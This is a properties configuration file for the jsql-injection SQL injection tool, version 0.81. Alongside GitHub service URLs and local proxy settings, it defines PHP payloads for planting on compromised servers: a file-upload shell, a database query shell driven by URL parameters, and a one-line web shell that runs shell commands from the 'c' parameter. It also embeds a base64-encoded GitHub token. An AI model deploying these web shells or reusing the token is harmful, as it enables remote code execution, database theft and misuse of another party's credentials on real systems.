jsql.version = 0.81

github.webservice.url = https://raw.githubusercontent.com/ron190/jsql-injection/master/web/services/jsql-injection.json

github.webservice.i18n.url = https://raw.githubusercontent.com/ron190/jsql-injection/master/web/services/i18n/jsql.properties

github.issues.url = https://api.github.com/repos/ron190/jsql-injection/issues

github.url = https://github.com/ron190/jsql-injection

github.token = MGZkZDFhOTNlZjZkYTliOWJlMDcwNjM0Zjc5NTg0YTJlMDk3YTY4Yw==

shell.upload = <?php echo move_uploaded_file($_FILES['u']['tmp_name'], getcwd().'/'.basename($_FILES['u']['name']))?'${JSQL.LEAD}y':'n'; ?>

shell.sql = \
<${JSQL.LEAD}><?php mysql_connect('localhost',$_GET['u'],$_GET['p']);\
$result=mysql_query($r=$_GET['q'])or die('<SQLe>Query failed: '.mysql_error().'<${JSQL.TRAIL}>');\
if(is_resource($result)){\
echo'<SQLr>';\
while($row=mysql_fetch_array($result,MYSQL_NUM))echo'<tr><td>',join('</td><td>',$row),'</td></tr>';\
}else if($result==TRUE)echo'<SQLm>Query OK: ',mysql_affected_rows(),' row(s) affected';\
else if($result==FALSE)echo'<SQLm>Query failed';\
?><${JSQL.TRAIL}>

shell.web = <${JSQL.LEAD}><?php system($_GET['c']); ?><${JSQL.TRAIL}>

http.proxy.default.ip = 127.0.0.1
http.proxy.default.port = 8118
https.proxy.default.ip = 127.0.0.1
https.proxy.default.port = 8118

shell.system = 